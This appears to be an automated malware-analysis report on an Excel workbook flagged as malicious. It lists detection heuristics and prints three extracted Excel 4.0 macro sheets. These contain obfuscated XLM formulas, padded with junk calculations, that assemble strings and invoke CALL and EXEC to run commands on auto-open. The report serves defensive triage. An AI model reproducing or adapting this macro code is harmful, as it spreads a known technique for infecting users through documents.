MALICIOUS
182
Risk Score
Heuristics 4
-
Excel 4.0 macro sheet (3 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAMEWorkbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
-
Dangerous XLM formula APIs: FORMULA, CALL, HALT, EXEC critical OOXML_XLM_DANGEROUS_FNExcel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 5778 bytes |
SHA-256: 7cc29e0426c044da329e809d130552193749e3486fd84097688f127f76120087 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="AU11:AU26"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="11" spans="47:47" x14ac:dyDescent="0.25"><c r="AU11" s="3"/></row><row r="12" spans="47:47" x14ac:dyDescent="0.25"><c r="AU12" s="3"/></row><row r="13" spans="47:47" x14ac:dyDescent="0.25"><c r="AU13" s="3" t="b"><f>FORMULA('Doc4'!AT3&'Doc4'!AT4&'Doc4'!AT5&'Doc4'!AT6&'Doc4'!AT7&'Doc4'!AT8,'Doc1'!A110)</f><v>0</v></c></row><row r="14" spans="47:47" x14ac:dyDescent="0.25"><c r="AU14" s="3" t="b"><f>FORMULA('Doc4'!AU3&'Doc4'!AU4&'Doc4'!AU5&'Doc4'!AU6&'Doc4'!AU7&'Doc4'!AU8&'Doc4'!AU9&'Doc4'!AU10&'Doc4'!AU11&'Doc4'!AU12&'Doc4'!AU13&'Doc4'!AU14&'Doc4'!AU15&'Doc4'!AU16&'Doc4'!AU17&'Doc4'!AU18&'Doc4'!AU19&'Doc4'!AU20,'Doc1'!A111)</f><v>1</v></c></row><row r="15" spans="47:47" x14ac:dyDescent="0.25"><c r="AU15" s="3" t="b"><f>FORMULA('Doc4'!AV3&'Doc4'!AV4&'Doc4'!AV5,'Doc1'!A112)</f><v>1</v></c></row><row r="16" spans="47:47" x14ac:dyDescent="0.25"><c r="AU16" s="3" t="b"><f>FORMULA('Doc1'!A100&'Doc1'!A101&'Doc1'!A102&'Doc1'!A103,'Doc1'!A113)</f><v>1</v></c></row><row r="17" spans="47:47" x14ac:dyDescent="0.25"><c r="AU17" s="3" t="b"><f>FORMULA('Doc4'!AW3&'Doc4'!AW4&'Doc4'!AW5&'Doc4'!AW6&'Doc4'!AW7&'Doc4'!AW8&'Doc4'!AW9,'Doc1'!A115)</f><v>1</v></c></row><row r="18" spans="47:47" x14ac:dyDescent="0.25"><c r="AU18" s="3" t="b"><f>FORMULA('Doc4'!AX3&'Doc4'!AX4&'Doc4'!AX5&'Doc4'!AX6,'Doc1'!A116)</f><v>1</v></c></row><row r="19" spans="47:47" x14ac:dyDescent="0.25"><c r="AU19" s="3"/></row><row r="20" spans="47:47" x14ac:dyDescent="0.25"><c r="AU20" s="3"/></row><row r="21" spans="47:47" x14ac:dyDescent="0.25"><c r="AU21" s="3"/></row><row r="22" spans="47:47" x14ac:dyDescent="0.25"><c r="AU22" s="3" t="b"><f>RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!A110,'Doc1'!A111,'Doc1'!A112,'Doc4'!AW13,'Doc1'!A113,'Doc1'!A106,'Doc4'!AW15,'Doc4'!AW16)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)</f><v>0</v></c></row><row r="23" spans="47:47" x14ac:dyDescent="0.25"><c r="AU23" s="3"/></row><row r="24" spans="47:47" x14ac:dyDescent="0.25"><c r="AU24" s="3" t="b"><f>RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)='Doc1'!AJ5()=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)</f><v>0</v></c></row><row r="25" spans="47:47" x14ac:dyDescent="0.25"><c r="AU25" s="3"/></row><row r="26" spans="47:47" x14ac:dyDescent="0.25"><c r="AU26" s="3"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/><headerFooter alignWithMargins="0"/></xm:macrosheet>
|
|||
xlm_sheet_01.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet2.xml | 963 bytes |
SHA-256: 5e0b317bc9eef478a9b391aa848d4ca25c6a2921bbc6af4ad6fc140f76188572 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A100"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="100" spans="1:1" x14ac:dyDescent="0.25"><c r="A100" s="3" t="b"><f>HALT()</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><headerFooter alignWithMargins="0"/></xm:macrosheet> |
|||
xlm_sheet_02.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml | 3090 bytes |
SHA-256: 98345195494abbd762f0f368955be9eed2dfec729c77fce42164df297eed179f |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:AJ107"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="4.5703125" style="1"/></cols><sheetData><row r="5" spans="36:36" x14ac:dyDescent="0.25"><c r="AJ5" s="3" t="b"><f>SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=""&""&""&""&""&""&""&""=EXEC('Doc1'!$A$115&"2 "&'Doc1'!$A$106&'Doc1'!$A$116)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)='Doc2'!A100()=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)</f><v>0</v></c></row><row r="99" spans="1:1" x14ac:dyDescent="0.25"><c r="A99" s="4"/></row><row r="100" spans="1:1" x14ac:dyDescent="0.25"><c r="A100" s="4" t="s"><v>0</v></c></row><row r="101" spans="1:1" x14ac:dyDescent="0.25"><c r="A101" s="4" t="s"><v>1</v></c></row><row r="102" spans="1:1" x14ac:dyDescent="0.25"><c r="A102" s="4" t="s"><v>2</v></c></row><row r="103" spans="1:1" x14ac:dyDescent="0.25"><c r="A103" s="4" t="s"><v>3</v></c></row><row r="104" spans="1:1" x14ac:dyDescent="0.25"><c r="A104" s="4"/></row><row r="105" spans="1:1" x14ac:dyDescent="0.25"><c r="A105" s="4"/></row><row r="106" spans="1:1" x14ac:dyDescent="0.25"><c r="A106" s="4" t="s"><v>4</v></c></row><row r="107" spans="1:1" x14ac:dyDescent="0.25"><c r="A107" s="4"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><headerFooter alignWithMargins="0"/></xm:macrosheet>
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.